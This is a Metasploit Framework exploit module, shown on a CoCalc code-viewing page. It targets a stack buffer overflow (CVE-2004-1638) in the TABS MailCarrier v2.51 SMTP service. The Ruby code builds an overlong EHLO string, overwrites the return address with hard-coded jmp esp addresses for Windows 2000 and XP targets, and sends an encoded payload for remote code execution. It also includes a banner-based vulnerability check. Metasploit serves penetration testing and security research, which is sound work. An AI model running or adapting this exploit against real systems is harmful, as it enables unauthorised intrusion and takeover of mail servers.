CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'		=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',

14
      'Description'	=> %q{

15
          This module exploits the MailCarrier v2.51 suite SMTP service.

16
        The stack is overwritten when sending an overly long EHLO command.

17
      },

18
      'Author' 	    => [ 'aushack' ],

19
      'License'       => MSF_LICENSE,

20
      'References'    =>

21
      [

22
        [ 'CVE', '2004-1638' ],

23
        [ 'OSVDB', '11174' ],

24
        [ 'BID', '11535' ],

25
        [ 'EDB', '598' ],

26
      ],

27
      'Platform'      => ['win'],

28
      'Arch'		    => [ ARCH_X86 ],

29
      'Privileged'		=> true,

30
      'DefaultOptions'	=>

31
        {

32
          'EXITFUNC' 	=> 'thread',

33
        },

34
      'Payload' =>

35
        {

36
          #'Space'			=> 300,

37
          'BadChars' 		=> "\x00\x0a\x0d:",

38
          'StackAdjustment'	=> -3500,

39
        },

40
      'Targets' =>

41
        [

42
          # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.

43
          [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1

44
          [ 'Windows XP SP2 - EN', 		  { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en

45
        ],

46
      'DisclosureDate' => '2004-10-26',

47
      'DefaultTarget' => 0))

48


49
    register_options(

50
      [

51
        Opt::RPORT(25),

52
        Opt::LHOST(), # Required for stack offset

53
      ])

54
  end

55


56
  def check

57
    connect

58
    banner = sock.get_once || ''

59
    disconnect

60


61
    if banner.to_s =~ /ESMTP TABS Mail Server for Windows NT/

62
      return Exploit::CheckCode::Detected

63
    end

64
    return Exploit::CheckCode::Safe

65
  end

66


67
  def exploit

68
    connect

69


70
    sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)

71
    sploit << [target['Ret']].pack('V') + payload.encoded

72


73
    sock.put(sploit + "\r\n")

74


75
    handler

76
    disconnect

77
  end

78
end

79


80